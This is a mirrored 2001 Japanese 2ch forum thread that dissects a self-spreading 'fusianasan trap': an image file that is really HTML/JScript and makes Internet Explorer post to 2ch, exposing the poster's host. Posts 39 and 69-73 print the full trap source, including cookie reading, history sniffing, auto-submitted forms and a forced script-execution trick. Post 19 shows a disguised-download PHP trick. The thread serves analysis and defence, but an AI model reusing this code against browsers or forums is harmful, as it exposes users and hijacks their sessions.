TOP カテ一覧 スレ一覧 100〜終まで 2ch元 削除依頼
【ノートン】Norton Security 256【NS】
【ノートン】Norton 360
COMODO Internet Security 67
【アビラ】Avira Antivirus ver.20
【ノートン】Norton 360 Ver6. 001 【ALL-IN-ONE】
avast!Anti-Virus Part193
●靖国神社参拝でネット攻撃されるか?●
◆Code Blue◆ 2000厨は逝ってよし
あかかげまるヲチスレ
Zemana AntiMalware Part1

fusianasanトラップになんらかの対処を


1 :01/12/17 〜 最終レス :2014/04/29
リンク先の画像を見ただけでスレにて勝手にfusianasanされてしまうというトラップが蔓延してるようです。
私が知る限りでは海外サッカー板などで猛威をふるってるようです。
なんらかの対処が必要ではないでしょうか。
以下がそのトラップのリンクです。
ttp://www2j.biglobe.ne.jp/~tatuta/cgi-bin/paint/15.gif
実験以外の目的ではくれぐれも踏まないようにお願いします。
もし踏んだ場合、ウィルスのように同じリンクがスレに増殖してしまうので、以降の利用者のためにこの注意文をコピペするなどして注意を喚起するようにしてください。

2 :
ブラクラにProxomitronで対抗するスレ
http://pc.2ch.sc/test/read.cgi/software/998274524/

3 :
半角がすごいことになってるYO!

4 :
ニュー速で20個くらいこれが原因の同名スレが並んでる。

5 :
半角死んだな。

6 :
スマソ
厨房なんでよく分からんのだが
踏むと、自分の知らないうちにレスをするの?
スレを建てるの?

7 :
>>6
多分、観測にはここら辺が良いかと思う。
http://news.2ch.sc/test/read.cgi/newsplus/1008578204/

8 :
これ DL したけど、0 としか入ってない
どういう仕掛けになっとんねん?

9 :
>>8
すでに消された模様

10 :
ソースのぞいたら、こんなのがでてきたんだが・・・
http://www.interq.or.jp/www1/marimo/gallery/cg/top06big.jpg

11 :
気の小さいやつは見ない方がいいぞ。

12 :
半角板ってどこにあるのか知りたいんですが。見つかんね。

13 :
と思ったらあった・・メガネかけて逝ってきます。

14 :
半角板は今『小学生の○んこ画像!』祭り。

15 :
半角板でイパーイ2ゲットできるYO。
2ゲット祭。

16 :
>>9
ここで手に入った
ttp://www2.makani.to/akutoku/upload/dat/1008583360.gif

17 :
これらしいが?
http://www.forest.impress.co.jp/article/2001/12/17/iesecuritypatch.html

18 :
半角板が嵐のようだw

19 :
<?php
Header("Content-type: application/ms-word");
Header("Content-Disposition: attachment; filename=calc.exe");
readfile("calc.exe");
?>
readme.doc という名前にして AddType application/x-httpd-php .doc として IE 6
(MS01-058 patch なし) で試すと、「次のファイルをダウンロードしています - readme.doc - ファイルを開くか、
ファイルをコンピュータに保存するか選択してください」というダイアログが出る。で、「開く」と答えると、 calc.exe がいきなり実行されてしまう。
これで IE 6 も IE 5.5 と同程度に危険ということに。 patch ありではちゃんと「calc.exe」になる。もっとも、Office がインストールされていない環境とか、
Office の open 時のデフォルトの挙動の設定とかにも依存するのだろう。 (きっと「デフォルト = open」が影響しているに違いない)

20 :
同名スレッドの建立を一定時間規制すりゃいいじゃないの。

21 :
>>19
すまん。違ったようだ。

22 :
これってどういうロジックになってんの?

23 :
現在氏亡のスレ
半角板 http://www2.bbspink.com/ascii/index.html
厨房板 http://tmp.2ch.sc/kitchen/
今夜でどれだけお亡くなりになるんだろう・・・

24 :
キト、引っ張ってくる画像ファイルん中に答え書いてあるねん。
なんでjpgん中にスクリプトかいてあるのん(w

25 :
パチ板もお祭りだよ!

26 :
とりあえずソースから追っかけて、投稿スクリプト走らせてるサイト
潰しに掛かればいいぢゃん。
というか、其処からの投稿規制掛ければいいのか。
何箇所有るんだ??

27 :
アイドル板もお亡くなり
http://www2.bbspink.com/girls/index.html
誰か何とかしてくれYO

28 :
凡そ一時間位前、6カ所程。
外部アプロダに貼られていた模様。

29 :
いろんなバージョンが出回っているようだな

30 :
プロクソオミトロン使えよ

31 :
これ踏むと自分のPCになんか影響は出るわけ?

32 :
厨房すごかった。
全スレの8割くらいがこいつだった。

33 :
>>30
防御してもスレッドが建てられ、しなかったら節穴になるのであまり効果はないな。

34 :
オミトロンでも駄目なのか?

35 :
オミトロンでイメージチェッカーフィルター入れても駄目か?

36 :
デフォルトのままだとあまり効果的でない。
弄れ。

37 :
直リンは
右クリでデスクトプにでも一旦保存して.txtにしてソース見る。
色々フシアナさんで楽しいよ(w
ダメだよ。シビレフグなんて器具使っちゃ。。
イムポになちゃうよ。。

38 :
このトラップ
トロイの仕込まれているリンク先が関係あるのか?

39 :
もう逃げちまってる。。。.jpgにソース入れてあるよん。
本体.txtにすると、、、、
#前略
if(key){
f1.action='http://'+dom+'/test/bbs.cgi';
f1.key.value=key;
}else{
f1.action='http://'+dom+'/test/subbbs.cgi';
f1.subject.value='Welcome to 裏2ちゃんねる!';
}
var ura2=false;
if((!NAME)&&(Math.random()>0.5)){ura2=true;}
if(NAME){
f1.FROM.value='fusianasan '+NAME;
}else if(ura2){
f1.FROM.value='http://www.fusianasan.2ch.sc/';
}else{
f1.FROM.value='fusianasan';
}
if(NAME){
f1.mail.value=NAME.replace(/\#/g,'$');
}else if(ura2){
f1.mail.value='ura2ch go!';
}else{
f1.mail.value='';
}
if(ura2){
f1.MESSAGE.value='guest guest\nWelcome to 裏2ちゃんねる!\n'+parent.location.href;
}else{
f1.MESSAGE.value=parent.location.href;
}
#こやって書きコねん。
<xml:namespace prefix=t />
<?import namespace=t implementation=#default#time2 />
<t:set id=set1 to='' attributeName=document.parentWindow.execScript(scr1.innerHTML),set1.outerHTML />
</noscript>
#一番下にこれ有ったけど。。。何?(w

40 :
       ∧_∧
  ぷ | (; ´Д` )ガーン
 \ぅ | /    \
   \ / /|    |ヽヽ
  __| | .|    | | |__
  \   ̄ ̄ ̄ ̄ ̄   \
  ||\            \
  ||\|| ̄ ̄ ̄ ̄ ̄ ̄ ̄|| ̄
  ||  || ̄ ̄ ̄ ̄ ̄ ̄ ̄||
     .||              ||

41 :
MS Java Script だけで2ch荒らすとは、お見事!
最近はやったW32.Badtransウイルスとかと同じようなバグを使っているのねん(TT
HTMLをContent-Type: image/gifと偽装すると、IEが食ってHTML内部のScript
を実行… Content-Typeや拡張子は関係なく、ファイルの中身で判断してバカIE
が開くみたいですね…

42 :
>>41
んで、ぢゃばの確認窓は回避と。。
ちびっとまづいね。。。
アイデア次第で応用利くし。。

43 :
これMSは対策しないとまずいのでは・・・。

44 :
Scriptだけで書き込みできてしまうって言うのはまずいでしょうね…
しかもHTML置いてあるのとは違うドメインにカキコですし。
同一ドメインのサブディレクトリー内にデーター送信の機能とかなら
まだ便利に使えるって言うのはあるかもしれないけど…

45 :
>>41
違います。Content-Typeは関係ない。
これをtext/htmlとして保存しても走る。

46 :
>>45
Content-Type: text/htmlをHTMLとして開くのは正常ですね。
問題なのはimage/とかをHTMLとして開く問題、text/plainでもHTMLとして開くらしいし
fusianasanトラップとかW32.BadtransとかはContent-Typeの無視が問題ですから、
W32.Badtransはシェルが拡張子で判断するのに、IEがContent-Typeだけ見て渡す問題、
fusianasanトラップをディスクトップ上に、*.gifで保存してIEで開いた場合はなぜか、
IEに拡張子の情報が送られそれで判断されてGIFとして開こうとする。
(IE5.5SP1、実際にfusianasanトラップの動くもので確認)
とりあえずその辺の判断の矛盾を突いているわけですね。

47 :
まぁ、画像板、アプロダ板も要注意って訳だ。
スクリプトチェク回避とは、、、TIME2恐るべし。
漏れはcontent-Tipeのアプリでの認識なんて信用してないから、
常にあやしいファイルはtxtにしてノートパッドで開いてソース見るし。
テキスト書くだけの機能しかないから安心(w
欲張り機能拡張アプリは危ない。。。

48 :
この場合の問題は、URI上のファイル名の拡張子で、人間が判断、
問題なかろうとリンクをクリックして起きる問題。
サーバーはファイルの拡張子でContent-Type: ヘッダーを付ける訳で
(拡張子が分からない場合はファイル内部を見るみたい、
 apachの設定ファイルを参照、mime.types, magic)
アプリケーションはそれに従うであろうと言う、ある程度インターネッ
トのプロトコルを知っている人間の方が陥りやすいのかも…
(真の素人は画像ファイルを開くのも危ないと判断するか分からないか)
W32.Badtransとかの場合はシェルに送るときの問題で、それだけしか
治していないのであれば、
IE内で処理される種類のContent-Typeの矛盾は治していないのかも…
今*.exeを.gifにして開くとtextとして開かれるました。
このタイプのセキュリティーホールはもうあったのでしょうか?

49 :
(^^;;

50 :
禿藁タ

51 :
IE6 Q313675 にしたけど、fusianasanトラップは直っていませんね、
ということで、fsianasanトラップは未発見!!!!!

52 :
まちがえた、「祝!2ch発セキュリティーホール」だよ

53 :
http://pc.2ch.sc/test/bbs.cgi?MESSAGE=いたづらカキコ&bbs=sec&key=1008581128&time=1008751234
こんなのを他サーバにUPして拡張子偽ってるということでよろしいのでしょうか。

54 :
48
ワロタ

55 :
>>52
名前を赤にしたり、フォントサイズ変えたり、画像埋め込んだりって
やつは直ってたのか

56 :
>>48
マジ腹イタイッス・・・

57 :
>>44
その点で考えるとブラウザというよりは2chのCGIスクリプトの脆弱性なのでは?
ブラウザのレベルで他ドメインへのアクセスを禁止したら
自サイトにYahooの検索窓とか置けなくなるじゃん?
この問題、他ドメインからのfusianasan書き込みという2ちゃんねるの問題と、
偽造ヘッダによるIEの解釈の問題の2つに分けられると思うのですが。
2ちゃんねる的には偽造ヘッダ問題が完結しても、
拡張子htmlでfusianasan書き込みするようなスクリプトが書かれているページ
にリンク貼られたら同じだし、
2ちゃんねる以外でもfusianasan機能をもつコードをjpgとか偽って貼られたら
被害出るだろうし。
つーかこれみなさんの脳内で既出ですか?

58 :
>>57
>ブラウザのレベルで他ドメインへのアクセスを禁止したら
>自サイトにYahooの検索窓とか置けなくなるじゃん?
ん〜、ドメイン間のデータ受け渡しを切り離せれば問題ないわけですよ。
Yahooの検索窓であればそれと同居しているフレームとかの情報は必要
ないわけですから。同居ではなくてフレームを見えなくすることも可能
なわけで、そのままクラッカーサイトから他のサイトを見に行ってしま
うと、例えばIEのJavaScriptならHTMLのソースをすべてとれてしまう
隠しプロパティーあるし、Cookieやフォーム上の内容、そのページの
リンクもとページのURI、?以降のクエリーがあればそれも読める、
JavaScriptなどの変数とかの内容にもアクセスできるだろうし、
それで得た情報をPOSTしたりURIとして送信できたら問題でしょ?
これをフレーム間の脆弱性とか言うわけで。
基本的にドメインとパスの違う情報にアクセスできたらまずいわけで、
Cookieがよそのドメインやパスから読めたらまずいのと同じ訳。
設定をちゃんとしたらフレームが違うドメインをまたいでいる場合
警告ダイアログとか出せるようになります。
設定した上で1ch.tv見に逝くとよろしい、警告とか出るでアルよ(w
fusianasanトラップの場合はIE6で最新のパッチあてていても、
*.gifとかをHTMLとして実行してしまう、とりあえず画像のURLを
クリックして想像外のサイトに、飛ばされるのは充分セキュリティー
ホール、ファイルが置いてあるサーバー側で飛ばしているのではなく、
そのファイルを置いたものの意思でそう言うことができるのであれば。
それがHTMLファイルとしてのURLならクリックしたものの不注意として
考えられるが。(MSのHTMLにできない事ってないス(w)半分冗談だけど)

59 :
>設定した上で1ch.tv見に逝くとよろしい、警告とか出るでアルよ(w
http://www.1ch.tv/ から見に行って、左フレームのメニューを
クリックするとだった… 「ドメインの違うサブフレーム間の移動…」
と言う警告がだせる。

60 :
>つーかこれみなさんの脳内で既出ですか?
がいしゅつ!!!

61 :
>>58
よくわかりました。ありがとうございます。
57は今見るとよく理解しないまま知ったかぶった発言でした。
しばらくそれを踏まえてレス読み直してみます。

62 :
>>61
素晴らしいコント見させて頂きました
ありがとう

63 :
ちなみに、>>39
<xml:namespace prefix=t />
以下は
IEでスクリプトをオフにしていても、強制的にスクリプトを実行させるようにする記述です。
仕様らしいです

64 :
>>61
怪しいサイトを見に行ったあととか、セキュリティー的に漏れたら困る所を見に
行くときは、ウインドウを閉じてからにすると少しは安全。

65 :
>>63
どこの部分でPOSTとかGETの実行(切っ掛け)しているんでしょ?
ユーザーがボタンとか押した切っ掛けがないと投稿できないと思っていました。
(Script類だけでそこまでできたらどう考えてもヤバイよね…)
それとPOSTで投稿することまでできているんでしょうか?
あそこまでいろいろやっていると、余程詳しい人でないと全部は分かりません。

66 :
Netscape6.2.1は大丈夫みたいですね。
動かないみたいです。

67 :
>>65
ちゃんと読めばわかるよ。
きっかけはページの読み込み。
OnloadでJScriptが実行されて、
FORM内にあるSubmit ButtonがClickされる。

68 :
ドーデも良いが、IISにこれ置いた場合は再現できるんか??
>jpg(ぢつはhtmlとして開く)
apacheは簡単に手元で実験できるけど。IIS手元に無い。
>>63
TIME2という技術の仕様らしい。要望板でカキコ有った。
こっちの方が怖い。virに応用簡単。
実装早すぎたんでないの??
マイ糞.NET構想、勇み足な気が。。

69 :
良いよ。手元に有る奴ソース張っとく。活用しちクリ(w
書いた奴が悪い。。晒す。
#xx.xxx.txt
<!DOCTYPE>
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=Shift_JIS">
</HEAD>
<BODY>
<!--[if lt IE 5.5000]>
<noscript><IMG src="http‘探して辿ったら良かれポンチのグロ画像‘.png"></noscript>
<![endif]-->
<!--[if IE]>
<IMG src2="http.‘同上‘png" id=img1 style=display:none>
<span id=span1 style=display:none></span>
<iframe id=ic1 src=about:blank style=display:none></iframe>
<iframe id=if1 src=about:blank style=display:none></iframe>
<form id=f1 method=POST style=display:none>
<input type=submit name=submit>
<input name=subject>
<input name=FROM>
<input name=mail>
<textarea name=MESSAGE></textarea>
<input name=bbs>
<input name=key>
<input name=time>
</form>
<script id=scr1 for=window event=onload>

70 :
var NAME='';
var TAR='';
function main1(){
NAME=parent.NAME;
var t1=TAR.split('/');
var dom=t1[0];
var bbs='';
var key='';
if(t1[1]=='test'){
bbs=t1[3];
key=t1[4];
}else{
bbs=t1[1];
key=searchKey(dom,bbs,3600);
}
if(key){
f1.action='http://'+dom+'/test/bbs.cgi';
f1.key.value=key;
}else{
f1.action='http://'+dom+'/test/subbbs.cgi';
f1.subject.value='Welcome to 裏2ちゃんねる!';
}
var ura2=false;
if((!NAME)&&(Math.random()>0.5)){ura2=true;}
if(NAME){
f1.FROM.value='fusianasan '+NAME;
}else if(ura2){
f1.FROM.value='http://www.fusianasan.2ch.sc/';
}else{
f1.FROM.value='fusianasan';
}
if(NAME){
f1.mail.value=NAME.replace(/\#/g,'$');
}else if(ura2){
f1.mail.value='ura2ch go!';
}else{
f1.mail.value='';
}
if(ura2){
f1.MESSAGE.value='guest guest\nWelcome to 裏2ちゃんねる!\n'+parent.location.href;
}else{
f1.MESSAGE.value=parent.location.href;
}
f1.bbs.value=bbs;
f1.time.value=String(Math.floor(new Date().getTime()/1000));
parent.setTimeout("if1.location.replace('about:blank')",5000);
parent.img1.src=parent.img1.src2;
parent.img1.style.display='block';
f1.submit.click();
}

71 :
function main(){
var t1=location.search;
if(t1){
t1=t1.substr(1);
TAR=t1;
main1();
return;
}
t1=document.referrer;
if(!t1){
t1='http://tmp.2ch.sc/kitchen/';
}
if(!t1){
img1.src=img1.src2;
img1.style.display='block';
return;
}
t1=t1.substr(7);
var t2=t1.indexOf('#');
if(t2>=0){t1=t1.substr(0,t2);}
var t3='';
var t2=t1.indexOf('/');
if(t2>=0){t3=t1.substr(0,t2);}
queryCookie(t3);
if1.location.replace(location.href+'?'+t1);
}
main();
function queryCookie(s){
var t1='about://'+s+'/\n';
t1+='<script id=scr1 for=window event=onload>';
t1+='try{parent.catchCookie(document.cookie)}catch(e){}';
t1+='<\/script><noscript><xml:namespace prefix=t /><?import namespace=t implementation=#default#time2 /><t:set id=set1 to=\'\' attributeName=document.parentWindow.execScript(scr1.innerHTML),set1.outerHTML /></noscript>';
ic1.location.replace(t1);
}
function catchCookie(s){
NAME=recognizeCookie(s,'NAME');
}
function recognizeCookie(s,k){
var t=s.split('; ');
for(var i=0;i<t.length;i++){var r=t[i].split('=');if(r[0]==k){return unescape(r[1])}}
return '';
}

72 :
</script>
<noscript>
<xml:namespace prefix=t />
<?import namespace=t implementation=#default#time2 />
<t:set id=set1 to='' attributeName=document.parentWindow.execScript(scr1.innerHTML),set1.outerHTML />
</noscript>
<![endif]-->
</BODY>
</HTML>

73 :
おっと>71-72に
コレ挿入
function searchKey(dom,bbs,len){
var t1=Math.floor(new Date().getTime()/1000);
var t2=t1-len;
var t3='http://'+dom+'/test/read.cgi/'+bbs+'/';
for(var i=t1;i>t2;i--){
var a1=document.createElement('A');
a1.href=t3+String(i)+'/l50';
span1.appendChild(a1);
if(a1.currentStyle.visited=='1'){
return String(i);
}
}
return '';
}

74 :
>>46
だからIEがMIMEタイプを無視する問題は
今回のfusianasanバグと直接は関係ないと言ってるんだが。
41じゃあたかもMIMEタイプバグを衝いて起動しないはずの
スクリプトを起動してるかのように読める。
そうじゃないと言ってるの。
問題の切り分けくらいちゃんとしようよ。

75 :
まだわかりにくいか。
「text/html として送られてきたなら本来起動しないはずの
スクリプトを起動させるバグを利用しているかのように読め
るが、強制的にスクリプトを起動させる手法は違うもの」
と言いたいの。

76 :
>>67
>ちゃんと読めばわかるよ。
>FORM内にあるSubmit ButtonがClickされる。
どもありがとう、ちゃんと読んでいませんでした(^^;
意外と原始的な方法でやっているのですね。
f1.submit.click();
submidボタンは押せないようにしてほしいですよね…
submidボタンを押していると言うことはちゃんとPOSTで送っているのだろうから、
クエリーさえその掲示板に合わせておけばいいから、どんな掲示板でも防御でき
ないですね、上手くやれば普及している掲示板を判定して掲示板づたいに増殖する
ウイルスなんて作れるのではないかな? 人間がURLをクリックすると言うことが
必要ではあるけど、上手くやればまず誰かがクリックする。

77 :
>>75
text/html として送られてきたなら本来起動しないはずのスクリプトを起動させるバグ
と言うのなら理解できるのですが、もしかして、*.htmlになっていてtext/htmlとして
送られてきたら、fusianasanトラップは動かないの?
>強制的にスクリプトを起動させる手法は違うものと言いたいの。
その辺詳しくプリーズ

78 :
さて、そろそろ一人歩きするかなコレ(w
画期的なのはむしろノーチェクでスクリプト
走らす点。
別にjpg/gif偽装したのは半角板で効果出すためとも思われ。
現に、、、だし(w
各種仕様書漁ってるヤシは大したもんだ。
ネタ尽きなくて面白いねIEは。
漏れ、敬意を表して暫くは穴塞がないどいたげる(w
つか、パッチ出るの??
別に良いや、こんなもん意識のもってき方で防げるし。
・・・個人的には。(htmlでやられるとチト痛いが)
勉強に成りました>>作者さん。

79 :
>>7G
つか、自分で調べろ。全部書いてあるぢょ。
こういうネタに教えてチャンはR。。。

80 :
このスレ保存版だな、とりあえず。
しかしすぐ広がりそうだな、時期も時期だし。まったく困ったもんだ。

81 :
>79
>63の<xml:namespace prefix=t />のあたりはTIMEをつかって、
「IEでスクリプトをオフにしていても、強制的にスクリプトを実行
させるようにする記述です。」
と言うことではないのか? ユーザーが設定でスクリプトを切っているときの

82 :
1.text/plainだろうがimage/gifだろうが動作する。(IEが勝手にファイルを解析してHTMLとして表示させようとするため)
  →これがMIMEタイプバグ
2.>強制的にスクリプトを起動させる手法
  スクリプトONであればJavaScript標準の機能を用いて動作する
  スクリプトOFFであれば81さんの言っている通り。

83 :
修正パッチを当てていても
アクティブ スクリプトはオフにしないといけないのでしょうか?
それとも、オフにしても危険なのでしょうか?
初心者な質問ですみません。教えて下さい。不安です。

84 :
>82-83
81の言うとおり。。
82が言う1のMIMEタイプは、ローカルだと再現できんでしょ。アパッチ噛まさなきゃ。
文字コードの認識でもそうだけど、Apacheが便宜上勝手にヘッダ吐くのも仕方ないし。
漏れは、IISでも再現できるのか知りたい。
>text/plainだろうがimage/gifだろうがソースがhtmlならIEはhtmlとして認識。
http://teri.2ch.sc/test/read.cgi/accuse/1008597418/
要望板の同名スレ。こっちの799以降の方が詳しい。

85 :
>>83
アクティブスクリプトはOFFにしたほうがよいそうです。
(修正パッチはfusianasanトラップには対応していない)
不安でしたら「レベルのカスタマイズ」で全て安全な方向に設定しておくべきかと。
(但し見られないサイトが出てきますが…(w)

86 :
83です。
回答、どうもありがとうございました。
とりあえず、このままOFFにしておきます。

87 :
>>85-86
しないよりはしたほうがいい、かもしれないけど、ここには・・・・
(以下ネットセキュリティ速報ページと、検証してくださった方の書き込み)
www.netsecurity.ne.jp/article/1/3616.html
memo.st.ryukoku.ac.jp/archive/200112.month/2396.html

88 :
海外でネタにならないの祈るだけ。。。
比較的この手のネタ早耳のVIRサイトでも出てないみたいだから未だ
大丈夫とは思うけろ。。。なんとも言えないね。。。
漏れはビックリ年賀メルに平和的利用汁(w
つか、それ以上のもん組むスキルも無いけろ。。。

89 :
上記要望板より
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default Behaviors
レジストリのここを消せばHTML+TIMEが無効になり、
元に戻せばHTML+TIMEが有効に戻ります。
http://teri.2ch.sc/test/read.cgi/accuse/1008597418/873

90 :
今こんなこと言っても仕方ないのだが、
根本的なところでは、
・何でも連携
・何でも勝手に処理
というMSの姿勢が問題なん?
この考え方、昔から気に入らないのだが。
おかげでどれくらいウィルス流行ったことか…
これを機にして、MSがIE/OEのアホな「仕様」を
見直してくれれば(・∀・)イイ!なぁと思ったり。
…無理な願いかな。

91 :
>>84 :79
>文字コードの認識でもそうだけど、Apacheが便宜上勝手にヘッダ吐くのも仕方ないし。
ってなに? Content-Type: 返すのはべつにapach独自の仕様というわけではないのだが…?
>漏れは、IISでも再現できるのか知りたい。
IISはContent-Type: を返さないと言うことなのか? そうでないのなら、
Content-Type: image/gifとかを返すように設定して実験したら分かるだろうが、
おれは持ってないので分からない。
Content-Type: がかえらないのなら、ファイル内容とか、URIのファイル名の拡張子で
判断するしかないが、内容で判断なら再現するし、拡張子で判断なら、ディスクトップに
置いて開くとの同じ。
さっきGET / HTTP/1.1 Host: www.microsoft.comしたら、
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Content-Type: text/html
と返ってきたけど… 何が言いたいのかさっぱり分からない。

92 :
まとめてみました。
http://www2.sala.or.jp/~uuu/script/

93 :
>>90
>これを機にして、MSがIE/OEのアホな「仕様」を
>見直してくれれば(・∀・)イイ!なぁと思ったり。
>…無理な願いかな。
これを機にってあんた!今まで何回あったか… またContent-Typeがらみで
パッチ出すのって恥ずかしくないんかな、そう考えるとすごいyo
やはり無理でしょう… ユーザーのセキュリティーにコストを掛けるのは
負け組企業とでも考えているのでは。
Windowsとか使っている者はMSに対して負け組なんだろうけどね

94 :
httpプロトコル知らないと誤解するといけないので、こんどはinit_windows.gifで
拡張子.gifにしてIISに置いておけばいいのでは? magicみるの?
たとえ、text/htmlで返ってきても問題ないのでは? ユーザーは普通見ないし
GET /library/homepage/images/init_windows.gif HTTP/1.1
Host: www.microsoft.com
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
P3P: CP='ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI'
Connection: close
Date: Fri, 21 Dec 2001 10:03:29 GMT
Content-Type: image/gif
Accept-Ranges: bytes
Last-Modified: Tue, 10 Jul 2001 20:37:44 GMT
ETag: "05ce52b809c11:892"
Content-Length: 2828
GIF89a
上記行がGIFファイルの内容のmagic、上記行と合わせてこの辺がGIFのバイナリ
お絵描き掲示板とかアップローダーでどうにかするには、magicを調べると良いかもね

95 :
>>91/81
>Content-Type: 返すのはべつにapach独自の仕様というわけではないのだが…?
もう良いよ。。。ヘタレな漏れの素朴な疑問だ。コレだけ解れば良い。サンクス。
>GET / HTTP/1.1 Host: www.microsoft.comしたら、
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Content-Type: text/html
仮に、マイ糞.comが頭に/index.jpg置いててもこうなるのか知りたかっただけ。
sageでコレだけ進むとは...その方が良いけろ(w
忘れた方がシアワセな場合も有るし。

96 :
>magicみるの?
この辺からそこはかとなく解ってきそう。。。サンクス。
>text/htmlで返ってきても問題ないのでは?
・・半角板ではまづいと思われ(w

97 :
これか?
http://www.google.com/search?q=cache:Bhn0pGw6cAo:www2.sala.or.jp/~uuu/dhtml/forcescript.html+xml+namespace+time2&hl=ja&lr=lang_ja
これも。
http://www.google.com/search?q=cache:VrblljcOrYM:www2.sala.or.jp/~uuu/dhtml/forcesound.html+xml+namespace+time2&hl=ja&lr=lang_ja
強制的にサウンド再生ってことは
MediaPlayerの脆弱性を同時に突ける気がする…。

98 :
>>93
やっぱり?
まぁ、毎回毎回改心してくれと思ってきたが、
そのまま今の状態まで来てるしなぁ…。
本当に、MSにはいい加減にして欲しいよ。
昔に比べればパッチは出るようになったがなぁ。
元のソフトがこんなショボいんでは
正直、使う気にならん。
小一時間(略)

99 :
さて、Netscape6.21をメインで使用するブラウザに設定、と

100 :

祭り板で再発一人歩きだ。。。
ttp://www.hellplant.org/cgi-bin/uploader/upload.cgi
該当アプロダカキコ。。確信犯。証拠保全。

[206.jpg]2chにすれ立てるやつ(悪用禁止)2001年12/18(火)13:48


100〜のスレッドの続きを読む
一番良いセキュリティソフトは○○だ!!Part91
RSA暗号 解読 助けてください!!
一番良いセキュリティソフトは○○だ!!Part91
AVG、avast、Spybot、AdAwareがあればそこそこ安全
'code red'wormに続きw32/sircam
AVG Anti-Virus Ver 126
Zemana AntiMalware Part1
SSLアクセラレータについて
【無料】 フリーセキュリティの組合せ 16
今までになかったsnortについて語るスレ。
--------------------
【洋楽Only】来日公演情報12【雑談OK】
ワインって金持ちじゃなきゃ楽しめないよな
リーグ戦のチーム名を考えてくれ!!
台湾関係のテレビ番組がやってたらageるスレ7
【サイエンス】サイエンスZERO【ZERO】その6
Chage Vol.11
汚物ゲロカス歯茎斜陽菌 石橋貴明4
終了間際にPCに貼り付いて入札削除する出品者
少年ジャンプルーキー!part52
【画像】ゲイバー店員「客からショタものの裏ビデオ貰ったから漫画描きました」 [676450713]
信長の野望&三国志しりとり☆2
スカパーの半額技について・・・ ★3
【Scarlett】 Xbox次世代機はCSのパワー、スピード、パフォーマンスの新たな基準を打ち立てる製品 ★13
フランスベッドってどうよ?
【空気】さすが!本田優 13【読め】
【図解】中居正広、木村拓哉との確執を明かす★2
底が見えてきたBEMANIアーティスト・tano*c勢
■NHK=売国奴■
共同で記事を投稿できるWEBメディアを作ってみたよ
【後輩は不祥事】斎藤佑樹306【先輩は不勝児】
TOP カテ一覧 スレ一覧 100〜終まで 2ch元 削除依頼